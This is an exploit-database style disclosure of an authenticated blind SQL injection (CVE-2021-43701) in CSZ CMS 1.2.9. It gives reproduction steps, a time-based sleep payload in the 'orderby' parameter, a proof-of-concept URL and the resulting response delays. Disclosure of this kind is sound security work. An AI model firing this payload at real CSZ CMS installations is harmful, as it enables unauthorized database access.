# Exploit Title: CSZ CMS 1.2.9 - 'Multiple' Blind SQLi(Authenticated)# Date: 2021-04-14# Exploit Author: Rahad Chowdhury# Vendor Homepage: https://www.cszcms.com/# Software Link: https://sourceforge.net/projects/cszcms/files/install/CSZCMS-V1.2.9.zip# Version: 1.2.9# Tested on: Windows 10, Kali Linux, PHP 7.4.16, Apache 2.4.46# CVE: CVE-2021-43701*Steps to Reproduce:*1. First login to your Admin Panel
2. then go to "General Menu > CSV Export / Import".3.open burp site and configure with browser.4. then select any"Table Name"> Select "Fields Select"and Select "Sort by"5. Now click "Export to CSV"and intercept with burp suite
6."fieldS[]"or"orderby" parameter is vulnerable. Let's try to inject Blind SQL Injection using this query "(select(0)from(select(sleep(10)))a)"in"orderby" parameter.*Proof of Concept:*
http://127.0.0.1/CSZCMS/admin/export/getcsv/article_db?fieldS%5B%5D=article_db_id&orderby=(select(0)from(select(sleep(10)))a)&sort=ASC&submit=Export+to+CSV
*Output:*
By issuing sleep(0) response will be delayed to 0 seconds.
By issuing sleep(1) response will be delayed to 1 seconds.
By issuing sleep(5) response will be delayed to 5 seconds.
By issuing sleep(10) response will be delayed to 10 seconds
